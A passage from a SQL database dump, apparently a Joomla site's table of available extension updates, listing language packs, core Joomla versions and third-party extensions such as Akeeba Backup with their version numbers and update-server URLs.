-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3975,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3976,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3977,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3978,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3979,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3980,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3981,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3982,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3983,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3984,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3985,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3986,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3987,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3988,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3989,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3990,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3991,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3992,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3993,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3994,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3995,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3996,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3997,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3998,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3999,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4000,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4001,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4002,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(4003,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(4004,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(4005,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4006,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4007,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4008,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4009,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4010,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4011,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4012,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4013,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4014,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4015,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4016,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4017,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4018,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4019,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4020,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4021,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4022,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4023,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4024,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4025,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4026,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4027,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4028,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4029,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4030,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4031,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4032,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4033,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4034,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4035,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4036,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4037,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4038,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4039,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4040,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4041,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4042,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4043,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4044,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4045,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4046,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4047,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4048,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4049,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4050,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4051,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(4052,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(4053,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(4054,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4055,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4056,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4057,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4058,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4059,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4060,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4061,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4062,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4063,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4064,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4065,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4066,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4067,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4068,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4069,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4070,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4071,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4072,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4073,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4074,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4075,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4076,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4077,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4078,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4079,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4080,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4081,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4082,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4083,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4084,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4085,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4086,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4087,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4088,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4089,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4090,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4091,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4092,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4093,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4094,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4095,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4096,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4097,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4098,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4099,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4100,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4101,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4102,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4103,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4104,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(4105,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(4106,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(4107,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4108,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4109,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4110,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4111,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4112,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4113,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4114,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4115,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4116,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4117,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4118,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4119,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4120,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4121,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4122,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4123,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4124,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4125,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4126,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4127,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4128,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4129,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4130,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4131,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4132,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4133,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4134,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4135,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4136,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4137,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4138,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4139,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4140,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4141,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4142,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4143,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4144,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4145,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4146,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4147,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4148,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4149,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4150,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4151,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4152,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4153,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4154,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(4155,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(4156,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(4157,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4158,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4159,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4160,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4161,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4162,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4163,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4164,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4165,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4166,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4167,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4168,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4169,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4170,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4171,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4172,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4173,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4174,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4175,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4176,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4177,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4178,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4179,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4180,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4181,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4182,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4183,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4184,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4185,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4186,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4187,3,0,'Portuguese 